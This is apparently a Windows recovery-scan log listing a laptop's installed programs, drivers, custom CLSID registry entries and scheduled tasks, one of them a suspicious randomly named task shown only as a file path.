Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32\...\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Microsoft Corporation)
MINIONAPP (HKLM-x32\...\MINIONAPP) (Version:  - )
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 50.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0 (x86 en-US)) (Version: 50.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.0.6152 - Mozilla)
Nitro Pro 10 (HKLM\...\{C78478E6-8206-470E-B843-0204995371C6}) (Version: 10.5.1.17 - Nitro)
NVIDIA 3D Vision Driver 364.51 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.51 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 364.51 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.51 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office Timeline (HKLM-x32\...\{952D3A31-D176-4B3F-8BA5-ED770C2862FD}) (Version: 3.2.0 - Office Timeline)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Paladins (HKLM\...\Steam App 444090) (Version:  - Hi-Rez Studios)
Plagiarism Checker X (HKLM-x32\...\Plagiarism Checker X 5.1.4) (Version: 5.1.4 - Plagiarism Checker X, LLC)
Plagiarism Checker X (x32 Version: 5.1.4 - Plagiarism Checker X, LLC) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.332 - Qualcomm Atheros Communications)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QUESTV5-6R2013 (HKLM-x32\...\QUESTV5-6R2013) (Version: 0.5.2.1 - DELMIA CORP)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21288 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7714 - Realtek Semiconductor Corp.)
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.27 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.27.101 - Skype Technologies S.A.)
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tree of Savior (English Ver.) (HKLM\...\Steam App 372000) (Version:  - IMCGAMES Co.,Ltd.)
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.7.16817.1002 - UCWeb Inc.)
VBA (3821b) (x32 Version: 6.01.00.1234 - Microsoft Corporation) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Warframe (HKLM-x32\...\Steam App 230410) (Version:  - Digital Extremes)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.2.11.570 - ASUS Cloud Corporation)
Windows Driver Package - AMD (amdkmpfd) System  (02/12/2015 15.20.0.0000) (HKLM\...\708AE871DE4DE98C022B914117B48025341D07B8) (Version: 02/12/2015 15.20.0.0000 - AMD)
Windows Driver Package - AMD (amdkmpfd) System  (08/10/2015 15.201.0.0000) (HKLM\...\77418A2019FA69F93B068CA252F72AE8FCA06AFC) (Version: 08/10/2015 15.201.0.0000 - AMD)
Windows Driver Package - AMD (amdkmpfd) System  (10/27/2014 14.50.0.0000) (HKLM\...\5A7765005233CFA47E5637DE2EE4BF3DBA797BD7) (Version: 10/27/2014 14.50.0.0000 - AMD)
Windows Driver Package - ASUS (ATP) Mouse  (01/13/2015 1.0.0.233) (HKLM\...\8335D73177E6D80E7ADC00FED2275758BD28AEFB) (Version: 01/13/2015 1.0.0.233 - ASUS)
Windows Driver Package - ASUS (ATP) Mouse  (02/24/2016 1.0.0.262) (HKLM\...\62C40FA617FED5B2A080FDFA260932672C6B64D7) (Version: 02/24/2016 1.0.0.262 - ASUS)
Windows Driver Package - ASUS (HIDSwitch) System  (08/18/2015 1.0.0.5) (HKLM\...\6D6063B1EDBCB582F1E596B1EB8BBFAAA100B1BD) (Version: 08/18/2015 1.0.0.5 - ASUS)
Windows Driver Package - Compal Electronics, INC. (LPCFilter) System  (07/17/2013 1.0.64.7) (HKLM\...\BFB1E8A5D4648875943225EF2EAD7388E4A14B63) (Version: 07/17/2013 1.0.64.7 - Compal Electronics, INC.)
Windows Driver Package - Compal Electronics, INC. (RadioSwitchHid) HIDClass  (11/25/2014 1.0.0.5) (HKLM\...\41439C53BF81572B2E179478239AB8D71353CD8C) (Version: 11/25/2014 1.0.0.5 - Compal Electronics, INC.)
Windows Driver Package - ELAN SMBus (ETDSMBus) System  (08/06/2015 15.1.2.5) (HKLM\...\94D4ADBD3EF82E234DF58F1B9BD18B24B775A6D0) (Version: 08/06/2015 15.1.2.5 - ELAN SMBus)
Windows Driver Package - Intel (ICCWDT) System  (05/04/2012 9.0.1000) (HKLM\...\AB145B4AADC822DEC6DD4C8C7B5E9F3F5A49A9CA) (Version: 05/04/2012 9.0.1000 - Intel)
Windows Driver Package - Intel (ICCWDT) System  (09/20/2015 11.0.0.1007) (HKLM\...\2C8BF84CDD1779C9F2F280CB9F57EDE2A692565B) (Version: 09/20/2015 11.0.0.1007 - Intel)
Windows Driver Package - Intel (IntelHSWPcc) System  (09/04/2014 1.0.0.1018) (HKLM\...\E25E8DD6C05A5E32F31DB1F3AC00F10F9697B0E9) (Version: 09/04/2014 1.0.0.1018 - Intel)
Windows Driver Package - Intel (MEIx64) System  (05/08/2015 11.0.0.1136) (HKLM\...\6B56264885325198F50575ED257D26F2C8FD7838) (Version: 05/08/2015 11.0.0.1136 - Intel)
Windows Driver Package - Intel (MEIx64) System  (07/07/2015 11.0.0.1157) (HKLM\...\0B20AD533A71C19F1C9AC8BB34246A06D7EAD201) (Version: 07/07/2015 11.0.0.1157 - Intel)
Windows Driver Package - Intel (MEIx64) System  (08/31/2015 11.0.0.1166) (HKLM\...\56828F7A1FBB820CB823362B664C0B3A501562F9) (Version: 08/31/2015 11.0.0.1166 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/08/2015 11.0.0.1172) (HKLM\...\5C253A305A9B81390BDF72537C0C93D01AFD2AA8) (Version: 10/08/2015 11.0.0.1172 - Intel)
Windows Driver Package - Intel Corporation (btmaux) BluetoothAuxiliary  (04/01/2015 17.1.1504.0518) (HKLM\...\74038EB8F8A791CB68543FE4825A6651A165DCF4) (Version: 04/01/2015 17.1.1504.0518 - Intel Corporation)
Windows Driver Package - Intel Corporation (btmaux) BluetoothAuxiliary  (10/28/2014 17.1.1411.0496) (HKLM\...\92F58626886ABC55707526202902B79AE03331B9) (Version: 10/28/2014 17.1.1411.0496 - Intel Corporation)
Windows Driver Package - Intel Corporation (iaLPSS_GPIO) System  (02/24/2015 1.1.253.0) (HKLM\...\A9D48A9F8F3CB7E174ED8604602F6284F10BBF7F) (Version: 02/24/2015 1.1.253.0 - Intel Corporation)
Windows Driver Package - Intel Corporation (iaLPSS_GPIO) System  (06/13/2014 1.1.226.2) (HKLM\...\8BC4E9FD6C3043002821AE8637B64D1F49158967) (Version: 06/13/2014 1.1.226.2 - Intel Corporation)
Windows Driver Package - Intel Corporation (iwdbus) System  (06/08/2015 4.5.61.0) (HKLM\...\6906C4E660D2560BFFE03BF511956BAD888AEE15) (Version: 06/08/2015 4.5.61.0 - Intel Corporation)
Windows Driver Package - Intel System  (04/22/2015 10.0.27) (HKLM\...\C2E04C3A435271574D9636E46D2F9F5C4E51D695) (Version: 04/22/2015 10.0.27 - Intel)
Windows Driver Package - INTEL System  (06/26/2015 10.1.1.8) (HKLM\...\D2C960E0737522BC4A2A680A745F92CEAC5C76C6) (Version: 06/26/2015 10.1.1.8 - INTEL)
Windows Driver Package - INTEL System  (08/17/2015 10.1.1.11) (HKLM\...\CBE4A395C177DEC450816F000AAD383C8FCDED76) (Version: 08/17/2015 10.1.1.11 - INTEL)
Windows Driver Package - INTEL System  (09/21/2015 10.1.1.12) (HKLM\...\89DFBAA5404A383FAA6C8BF70D5ED1C969678B90) (Version: 09/21/2015 10.1.1.12 - INTEL)
Windows Driver Package - INTEL System  (09/21/2015 10.1.1.12) (HKLM\...\C2312C77A88CE202E250D01A0793BD38576D13BF) (Version: 09/21/2015 10.1.1.12 - INTEL)
Windows Driver Package - INTEL System  (10/28/2015 10.1.1.13) (HKLM\...\88BA94C0D148C6110CBE3FC925052722C961BE46) (Version: 10/28/2015 10.1.1.13 - INTEL)
Windows Driver Package - INTEL System  (10/28/2015 10.1.1.13) (HKLM\...\D5DCF8D64874C0501270DD6745C0B98332802514) (Version: 10/28/2015 10.1.1.13 - INTEL)
Windows Driver Package - Kionix, Inc. (kxspb) Sensor I/O devices  (09/14/2015 1.2.8.5) (HKLM\...\530FE28922151FFB70966BFE934D1189FE03A49F) (Version: 09/14/2015 1.2.8.5 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (kxspb) Sensor I/O devices  (10/21/2014 1.2.7.9) (HKLM\...\C38347B1F2610B28BFC196DC49544B06129D43BA) (Version: 10/21/2014 1.2.7.9 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (WUDFRd) Sensor  (09/22/2015 1.0.29.5) (HKLM\...\52D31A33575A8052149E15AC844D6E1350361F1C) (Version: 09/22/2015 1.0.29.5 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (WUDFRd) Sensor  (10/21/2014 1.0.19.2) (HKLM\...\F7038EE78CCD48375CE4C803EAA8ECE752A0B945) (Version: 10/21/2014 1.0.19.2 - Kionix, Inc.)
Windows Driver Package - KYE System Corp. (ioFakMap) HIDClass  (09/09/2013 6.3.0.1) (HKLM\...\2D411C1C731F85B0AE8A713F3C27A67932A89369) (Version: 09/09/2013 6.3.0.1 - KYE System Corp.)
Windows Driver Package - LG Electronics Inc. (AirModeBtn) HIDClass  (08/12/2015 1.0.1508.1201) (HKLM\...\488F076C8A3658890AFD8181D71BB3E02C79B505) (Version: 08/12/2015 1.0.1508.1201 - LG Electronics Inc.)
Windows Driver Package - LXD Company (HidUsb) HIDClass  (01/26/2013 21.8.1.319) (HKLM\...\20BC7264702987FA22B790C85433BF8189B3F5CC) (Version: 01/26/2013 21.8.1.319 - LXD Company)
Windows Driver Package - Microsoft Battery  (11/13/2015 1.2.0.2) (HKLM\...\D94A6ADF78DC5F14DEE64147DCDF230ED63FD734) (Version: 11/13/2015 1.2.0.2 - Microsoft)
Windows Driver Package - NVIDIA (nvvad_WaveExtensible) MEDIA  (07/01/2015 1.2.30) (HKLM\...\679747FD57E83C302F47D978BAC9FE6AF70CE1CC) (Version: 07/01/2015 1.2.30 - NVIDIA)
Windows Driver Package - Qualcomm Atheros Communications (AthBTPort) BluetoothVirtual  (07/11/2014 5.0.0.325) (HKLM\...\38DC38C20D3DEFEC308EE9CAC3E92626A6835FE4) (Version: 07/11/2014 5.0.0.325 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_A2DP) MEDIA  (04/13/2015 8.0.0001.0344) (HKLM\...\1D55C2EFB7F9EDBC93FCAFEB4E6ED2B2808E6393) (Version: 04/13/2015 8.0.0001.0344 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_A2DP) MEDIA  (10/21/2014 8.0.0001.0334) (HKLM\...\82345FC9CC12826AC22FBD890640E3228D7B5749) (Version: 10/21/2014 8.0.0001.0334 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_BUS) System  (06/24/2014 4.0.0.302) (HKLM\...\F1D0D62AB241DAE33AEEB7B18B58C93AC5EF0960) (Version: 06/24/2014 4.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_BUS) System  (06/24/2014 5.0.0.302) (HKLM\...\23BE4DDD5B8D1D6468B9EA7477A0CB151AD2BBE0) (Version: 06/24/2014 5.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_HCRP) USB  (06/24/2014 4.0.0.302) (HKLM\...\7FDB810F985DEDF82F0A39A2E8BC92900F407E5D) (Version: 06/24/2014 4.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_RCP) HIDClass  (06/24/2014 5.0.0.302) (HKLM\...\BA6E71775209F137E4190CA49BC7D710983527F5) (Version: 06/24/2014 5.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (02/10/2015 8.0.0001.0341) (HKLM\...\77C4A18E3829EED89214F6A7DB29A0CC0B7633AC) (Version: 02/10/2015 8.0.0001.0341 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (04/13/2015 8.0.0001.0344) (HKLM\...\C82E283DDCCD918355483458494A76D34F8E0CFA) (Version: 04/13/2015 8.0.0001.0344 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (08/18/2015 8.0.0001.0350) (HKLM\...\A078EC4F59150BCFF6F354FEB73DD9F5851286B5) (Version: 08/18/2015 8.0.0001.0350 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (11/15/2015 10.0.1.5) (HKLM\...\9B5152351B89F71C344AF1866B2B210A7B5B0DD4) (Version: 11/15/2015 10.0.1.5 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (05/11/2015 10.0.0.315) (HKLM\...\933F7F90C905E23A1D26DB5FA1CABCEC09948DB8) (Version: 05/11/2015 10.0.0.315 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (08/14/2015 10.0.0.326) (HKLM\...\DB13626D524FDBB4F1938516AD0F957505E5E0D1) (Version: 08/14/2015 10.0.0.326 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (09/08/2015 10.0.0.328) (HKLM\...\17E0E467A4D63F7C740425A9D130DD1DD1BEB2ED) (Version: 09/08/2015 10.0.0.328 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (11/19/2015 10.0.0.329) (HKLM\...\6C56FFC61E89980B663FB6E4B5F392851F21E052) (Version: 11/19/2015 10.0.0.329 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Realtek (rt640x64) Net  (10/01/2015 10.006.1001.2015) (HKLM\...\8C869877E6B13D11BE068A1FF0AB655A587B57C7) (Version: 10/01/2015 10.006.1001.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (01/15/2015 8.038.0115.2015) (HKLM\...\A7CA58D9069C36E9CD3C2CD3EB1DCA83523B8AA3) (Version: 01/15/2015 8.038.0115.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (07/23/2015 8.040.0723.2015) (HKLM\...\26BE3CFD73A41A62774EEF6507CC626D7711405C) (Version: 07/23/2015 8.040.0723.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (10/01/2015 8.043.1001.2015) (HKLM\...\ECDA295C3C30A2525F2BFBE2BD8BCF6793745171) (Version: 10/01/2015 8.043.1001.2015 - Realtek)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (06/15/2015 10.0.10143.21278) (HKLM\...\F2FD59325AAB8BBE6C1AF29ED7F9AF722B308D9C) (Version: 06/15/2015 10.0.10143.21278 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (07/21/2015 10.0.10125.21277) (HKLM\...\9BC96092091368DDA2E6D635AB0EF426A2992B0F) (Version: 07/21/2015 10.0.10125.21277 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (08/04/2015 10.0.10240.21281) (HKLM\...\F7B7740FC9020ADAF1ECB9A80E7F7D38D10E6056) (Version: 08/04/2015 10.0.10240.21281 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (11/05/2015 10.0.10240.21283) (HKLM\...\17BCC849A54BDE6CBF50B5FA84EF12D9426EF794) (Version: 11/05/2015 10.0.10240.21283 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (11/13/2015 10.0.10240.21284) (HKLM\...\3C3E84F91B27A95FC6CE13898685AB8D64760165) (Version: 11/13/2015 10.0.10240.21284 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (12/12/2014 6.3.9600.21265) (HKLM\...\21EECE1A6FCC6E7F8745711F73279A44203A9645) (Version: 12/12/2014 6.3.9600.21265 - Realtek Semiconduct Corp.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.0.1 - ASUS)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> D:\New Folder (2)\AutoCAD 2017\acad.exe /Automation => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{67F4D210-BFC2-4ADD-9A2A-C9B9E1F42C4F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> D:\New Folder (2)\AutoCAD 2017\acad.exe => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> D:\New Folder (2)\AutoCAD 2017\en-US\acadficn.dll => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {001204FA-A720-4E4A-8C68-F6A19FE26670} - System32\Tasks\{98E2AC70-B5FB-4270-AB02-FEA0C9C05CB5} => pcalua.exe -a D:\UninstallQUESTV5-6R2013\UninstallQUEST.exe -d D:\UninstallQUESTV5-6R2013
Task: {03E84B3B-9181-4758-972C-740444795B22} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {0AA572A4-A4AB-4F79-ABDB-261BAABDF6F8} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {1482FCAC-85CE-4D06-9E9B-DA2F16054D48} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-05-17] (Dropbox, Inc.)
Task: {1CA1C9B4-450D-4C59-8EF4-C3E154D0B7A0} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2014-06-12] (ASUSTek Computer Inc.)
Task: {24248C31-0D20-4AF1-A6D0-E860D00DAEAC} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2014-09-03] (ASUSTek Computer Inc.)
Task: {25673809-56FA-4924-8958-6C17476DC3D8} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe
Task: {27D2FF47-863D-4F65-A92B-DDC550618EA6} - System32\Tasks\ASUS Patch for Touch Panel => C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe [2013-01-09] (ASUSTek Computer INC.)
Task: {3743E126-BB86-4C9D-B1DE-330357C78341} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {37AB26B8-FC0F-4B9D-BE7D-10487420029F} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2014-09-12] (ASUSTek Computer Inc.)
Task: {43FB2EB2-70FB-4365-8F9F-11394E9F9F44} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {47437558-8450-4C65-9C63-421D75E81921} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {4FF91C70-96AE-4C29-8D5B-A7D01D1B54C5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-08-27] (Microsoft Corporation)
Task: {5542EDAF-6016-406C-8E1E-95B0A1F7793A} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {57607482-32EA-459A-BA45-3F4374149C38} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-03-08] (Realtek Semiconductor)
Task: {5E0F0D2F-2336-4591-BA5D-5CA9497168A0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-07-04] (Microsoft Corporation)
Task: {6EF337AE-3C6C-4160-99AD-920848EF3829} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: {6EFA0047-6DC6-41EB-98E7-E4BBCC60A743} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {7A1720A3-EAAD-4776-B69B-CDCA7E9D5D41} - System32\Tasks\Zderse System => C:\Program Files (x86)\Sernetynuwuent\gapeck.exe
Task: {7A3E68FE-8760-482C-B320-605457FF6A66} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2016-03-08] (Realtek Semiconductor)
Task: {7D06E4E0-D6F5-4DB4-8F05-8B8219F26A86} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {828560A4-4907-4789-AAA4-E45CF1E5B85A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8D11FDEC-4359-4D19-B201-23352235A8E0} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
